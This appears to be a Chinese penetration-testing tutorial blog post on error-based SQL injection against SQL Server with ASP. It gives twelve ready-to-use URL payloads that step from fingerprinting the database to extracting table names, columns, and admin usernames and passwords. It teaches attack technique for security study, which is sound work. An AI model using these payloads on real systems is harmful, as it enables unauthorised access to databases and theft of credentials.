72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、SQLSERVER+ASP 报错注入

1、sql server的报错页面

(1)背景:在语句执行时发生错误会报出错误,并且会在网页上显示出来。
(2)环境:sql server2008+aspx
(4)原理:利用mssql在类型转换失败时的报错,显示其相应的信息!!!
(3)限制:一次只能爆出一个字段。

2、SQLSERVER+ASP 报错注入示例

(1)爆出数据库版本:?id=1 and @@version>0
在这里插入图片描述

(2)爆出数据库:?id=1 and db_name()>0
在这里插入图片描述

(3)爆当前用户:?id=1 and User_Name()>0
在这里插入图片描述

(4)爆出其他数据库:?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
在这里插入图片描述

(5)爆出其他数据库(排除master数据库):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
在这里插入图片描述

(6)爆出其他数据库(排除master和iNetinkCMS):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS'))>0
在这里插入图片描述

(7)爆当前数据库的表:?id=1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0
在这里插入图片描述

(8)爆出其他表(排除cmd):?id=1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0
在这里插入图片描述

(9)爆出列:?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin')>0
在这里插入图片描述

(10)爆出其他列(排除id):?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0
在这里插入图片描述

(11)爆出数据(username):?id=1 and (select top 1 username from admin)>0
在这里插入图片描述

(12)爆出数据(password):?id=1 and (select top 1 password from admin)>0
在这里插入图片描述

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值